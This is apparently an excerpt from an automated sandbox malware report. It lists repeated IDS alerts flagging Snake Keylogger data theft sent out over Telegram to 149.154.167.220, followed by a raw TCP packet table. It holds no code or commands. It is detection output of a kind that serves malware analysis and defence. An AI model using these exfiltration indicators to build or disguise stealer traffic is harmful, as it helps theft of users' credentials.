                                                                                                                2024-11-26T08:26:03.406589+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749906149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:05.312972+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749914149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:05.352639+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749913149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:05.393524+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749912149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:07.279485+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749920149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:07.345296+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749921149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:07.457694+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749922149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:09.366044+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749927149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:09.446698+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749930149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:09.474202+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749928149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:11.332919+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749933149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:11.428641+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749935149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:11.471048+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749936149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:13.256007+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749941149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:13.436690+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749942149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:13.501238+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749943149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:15.278867+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749948149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:15.348597+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749949149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:15.422819+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749950149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:17.209949+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749954149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:17.284332+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749956149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:17.536036+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749958149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:19.184103+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749962149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:19.312608+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749963149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:19.522199+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749964149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:21.092837+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749970149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:21.241718+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749971149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:21.592855+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749972149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:23.080079+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749978149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:23.222050+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749979149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:23.535147+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749980149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:25.245719+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749985149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:25.283026+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749987149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:25.589458+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749988149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:31.642373+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749995149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:31.656599+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749994149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:31.693328+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749996149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:33.574221+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750009149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:33.643595+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750010149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:33.752791+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750011149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:35.569075+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750017149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:35.681487+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750018149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:35.733782+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750019149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:37.715979+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750023149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:37.794071+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750027149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:37.818520+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750025149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:39.757265+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750031149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:39.795861+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750033149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:39.916899+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750032149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:41.912089+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750040149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:41.912183+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750039149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:41.929941+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750041149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:44.076440+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750047149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:44.094887+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750049149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:44.123470+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750048149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:46.030364+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750057149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:46.066302+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750055149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:46.115026+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750056149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:51.465312+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.750070149.154.167.220443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 26, 2024 08:24:41.450217009 CET49701443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.450263023 CET44349701185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:41.450376034 CET49701443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.450712919 CET49701443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.450783968 CET44349701185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:41.450880051 CET49701443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.478579998 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.478611946 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:41.478678942 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.481576920 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:41.481590986 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:42.921977997 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:42.922116995 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.069072008 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.069102049 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.069504976 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.124422073 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.375535011 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.423337936 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.942517996 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.942542076 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.942573071 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.942590952 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.942603111 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.942610979 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.942662954 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.943898916 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.943917036 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.943928957 CET49702443192.168.2.7185.166.143.48
                                                                                                                Nov 26, 2024 08:24:43.943933964 CET44349702185.166.143.48192.168.2.7
                                                                                                                Nov 26, 2024 08:24:44.192182064 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:44.192231894 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:44.192332029 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:44.192646027 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:44.192662954 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:45.662796021 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:45.662911892 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:45.730374098 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:45.730413914 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:45.730699062 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:45.733269930 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:45.779330969 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.137485027 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187424898 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187431097 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187450886 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187468052 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187477112 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187500000 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187516928 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.187534094 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187552929 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.187558889 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.235424042 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.371871948 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371891022 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371932983 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.371983051 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.372016907 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.372028112 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.372040987 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.372068882 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.378916025 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.423410892 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.423437119 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.423513889 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.423547029 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.423563004 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.437838078 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.437896967 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.437912941 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.490461111 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.560316086 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.560332060 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.560364008 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.560375929 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.560509920 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.560509920 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.560534000 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.560587883 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.565500021 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.595978022 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.596013069 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.596045017 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.596076965 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.596106052 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.596138000 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.630727053 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.630743027 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.630778074 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.630789042 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.630836964 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.630867958 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.630886078 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.665488005 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.665501118 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.665667057 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.665704012 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.665719986 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.665765047 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.696254969 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.742105007 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761317015 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761348963 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761363029 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761377096 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761387110 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.761418104 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.761440039 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.785794973 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785805941 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785840988 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785861015 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.785865068 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785872936 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785892010 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.785911083 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.785911083 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.785926104 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.802793980 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.802813053 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.802846909 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.802886963 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.802915096 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.802930117 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.815532923 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.815562010 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.815598965 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.815625906 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.815644979 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.827058077 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.827079058 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.827126026 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.827157974 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.827172041 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.873435020 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.873462915 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.921530008 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.942913055 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.942945004 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.942962885 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.942972898 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.943002939 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.943022013 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.943051100 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.943059921 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.943420887 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.953253984 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.953264952 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.953301907 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.953325987 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.953334093 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.953366041 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.964724064 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.964776993 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.964785099 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.964803934 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.964833021 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.964845896 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.974468946 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.974484921 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.974510908 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.974535942 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.974545002 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.974567890 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.984338999 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.984358072 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.984385014 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.984397888 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.984436035 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.993603945 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.993655920 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.993671894 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:46.993683100 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:46.993711948 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.004728079 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.004775047 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.004797935 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.004803896 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.004848003 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.004856110 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.004894972 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.014617920 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.014626026 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.014700890 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.014708996 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.014745951 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.014751911 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.065437078 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.150665998 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.150696993 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.150748014 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.150758982 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.150777102 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.150794983 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.150814056 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.158968925 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.158993006 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.159039021 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.159046888 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.159081936 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.167438984 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.167455912 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.167500019 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.167510986 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.167536974 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.175748110 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.175769091 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.175807953 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.175816059 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.175847054 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.184561968 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.184606075 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.184628010 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.184634924 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.184675932 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.184689045 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.184741974 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.193442106 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.193460941 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.193496943 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.193496943 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.193514109 CET4434970316.182.70.225192.168.2.7
                                                                                                                Nov 26, 2024 08:24:47.193531990 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.193556070 CET49703443192.168.2.716.182.70.225
                                                                                                                Nov 26, 2024 08:24:47.201353073 CET4434970316.182.70.225192.168.2.7
